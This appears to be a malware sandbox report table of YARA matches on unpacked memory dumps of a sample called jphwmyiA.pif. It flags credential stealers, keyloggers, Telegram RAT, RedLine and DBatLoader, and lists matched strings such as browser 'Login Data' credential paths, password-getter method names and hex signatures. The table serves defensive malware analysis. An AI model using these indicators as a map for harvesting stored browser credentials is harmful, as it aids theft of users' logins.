12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
7.2.jphwmyiA.pif.29cc99de.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.jphwmyiA.pif.29cc99de.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.jphwmyiA.pif.29cc99de.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.jphwmyiA.pif.29cc99de.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.jphwmyiA.pif.29cc99de.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.jphwmyiA.pif.29cc99de.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
7.2.jphwmyiA.pif.29cc99de.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
7.2.jphwmyiA.pif.29cc99de.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
3.2.jphwmyiA.pif.250b99de.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.jphwmyiA.pif.250b99de.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.jphwmyiA.pif.250b99de.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.jphwmyiA.pif.250b99de.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.jphwmyiA.pif.250b99de.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.jphwmyiA.pif.250b99de.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
3.2.jphwmyiA.pif.250b99de.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
3.2.jphwmyiA.pif.250b99de.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
4.2.Aiymwhpj.PIF.213733d8.6.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.yxU3AgeVTi.exe.22865a8.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
7.3.jphwmyiA.pif.27e8ce70.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.3.jphwmyiA.pif.27e8ce70.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.3.jphwmyiA.pif.27e8ce70.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.3.jphwmyiA.pif.27e8ce70.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.3.jphwmyiA.pif.27e8ce70.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
7.3.jphwmyiA.pif.27e8ce70.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
7.3.jphwmyiA.pif.27e8ce70.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
3.2.jphwmyiA.pif.25350ee8.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.jphwmyiA.pif.25350ee8.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.jphwmyiA.pif.25350ee8.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.jphwmyiA.pif.25350ee8.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.jphwmyiA.pif.25350ee8.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.jphwmyiA.pif.25350ee8.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
3.2.jphwmyiA.pif.25350ee8.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
3.2.jphwmyiA.pif.25350ee8.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
7.2.jphwmyiA.pif.29cca8c6.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.jphwmyiA.pif.29cca8c6.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.jphwmyiA.pif.29cca8c6.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.jphwmyiA.pif.29cca8c6.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.jphwmyiA.pif.29cca8c6.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
7.2.jphwmyiA.pif.29cca8c6.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
7.2.jphwmyiA.pif.29cca8c6.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
12.2.jphwmyiA.pif.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.jphwmyiA.pif.29f60000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.jphwmyiA.pif.29f60000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.jphwmyiA.pif.29f60000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.jphwmyiA.pif.29f60000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.jphwmyiA.pif.29f60000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d96a:$a1: get_encryptedPassword 0x3d93e:$a2: get_encryptedUsername 0x3da02:$a3: get_timePasswordChanged 0x3d91a:$a4: get_passwordField 0x3d980:$a5: set_encryptedPassword 0x3d74d:$a7: get_logins 0x38d9a:$a10: KeyLoggerEventArgs 0x38d69:$a11: KeyLoggerEventArgsEventHandler 0x3d821:$a13: _encryptedPassword
7.2.jphwmyiA.pif.29f60000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48a6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48111:$a3: \Google\Chrome\User Data\Default\Login Data 0x4836e:$a4: \Orbitum\User Data\Default\Login Data 0x48d4d:$a5: \Kometa\User Data\Default\Login Data
7.2.jphwmyiA.pif.29f60000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b512:$s1: UnHook 0x3b4ae:$s2: SetHook 0x3b4e7:$s3: CallNextHook 0x3b476:$s4: _hook
3.2.jphwmyiA.pif.250ba8c6.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.jphwmyiA.pif.250ba8c6.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.jphwmyiA.pif.250ba8c6.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.jphwmyiA.pif.250ba8c6.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.jphwmyiA.pif.250ba8c6.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
3.2.jphwmyiA.pif.250ba8c6.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
3.2.jphwmyiA.pif.250ba8c6.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
3.1.jphwmyiA.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
7.2.jphwmyiA.pif.29f60ee8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.jphwmyiA.pif.29f60ee8.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.jphwmyiA.pif.29f60ee8.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.jphwmyiA.pif.29f60ee8.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.jphwmyiA.pif.29f60ee8.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
7.2.jphwmyiA.pif.29f60ee8.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
7.2.jphwmyiA.pif.29f60ee8.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
3.2.jphwmyiA.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
12.2.jphwmyiA.pif.1b30a8c6.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.1b30a8c6.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.1b30a8c6.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.1b30a8c6.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.jphwmyiA.pif.1b30a8c6.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
12.2.jphwmyiA.pif.1b30a8c6.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.1b30a8c6.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
12.2.jphwmyiA.pif.1b3099de.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.1b3099de.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.1b3099de.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.1b3099de.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.jphwmyiA.pif.1b3099de.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d96a:$a1: get_encryptedPassword 0x3d93e:$a2: get_encryptedUsername 0x3da02:$a3: get_timePasswordChanged 0x3d91a:$a4: get_passwordField 0x3d980:$a5: set_encryptedPassword 0x3d74d:$a7: get_logins 0x38d9a:$a10: KeyLoggerEventArgs 0x38d69:$a11: KeyLoggerEventArgsEventHandler 0x3d821:$a13: _encryptedPassword
12.2.jphwmyiA.pif.1b3099de.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48a6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48111:$a3: \Google\Chrome\User Data\Default\Login Data 0x4836e:$a4: \Orbitum\User Data\Default\Login Data 0x48d4d:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.1b3099de.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b512:$s1: UnHook 0x3b4ae:$s2: SetHook 0x3b4e7:$s3: CallNextHook 0x3b476:$s4: _hook
12.2.jphwmyiA.pif.1d9f0000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.1d9f0000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.1d9f0000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.1d9f0000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.jphwmyiA.pif.1d9f0000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d96a:$a1: get_encryptedPassword 0x3d93e:$a2: get_encryptedUsername 0x3da02:$a3: get_timePasswordChanged 0x3d91a:$a4: get_passwordField 0x3d980:$a5: set_encryptedPassword 0x3d74d:$a7: get_logins 0x38d9a:$a10: KeyLoggerEventArgs 0x38d69:$a11: KeyLoggerEventArgsEventHandler 0x3d821:$a13: _encryptedPassword
12.2.jphwmyiA.pif.1d9f0000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48a6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48111:$a3: \Google\Chrome\User Data\Default\Login Data 0x4836e:$a4: \Orbitum\User Data\Default\Login Data 0x48d4d:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.1d9f0000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b512:$s1: UnHook 0x3b4ae:$s2: SetHook 0x3b4e7:$s3: CallNextHook 0x3b476:$s4: _hook
7.1.jphwmyiA.pif.400000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
12.1.jphwmyiA.pif.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
12.2.jphwmyiA.pif.1b3099de.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.1b3099de.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.2.jphwmyiA.pif.1b3099de.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.1b3099de.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.1b3099de.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.jphwmyiA.pif.1b3099de.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
12.2.jphwmyiA.pif.1b3099de.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.1b3099de.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
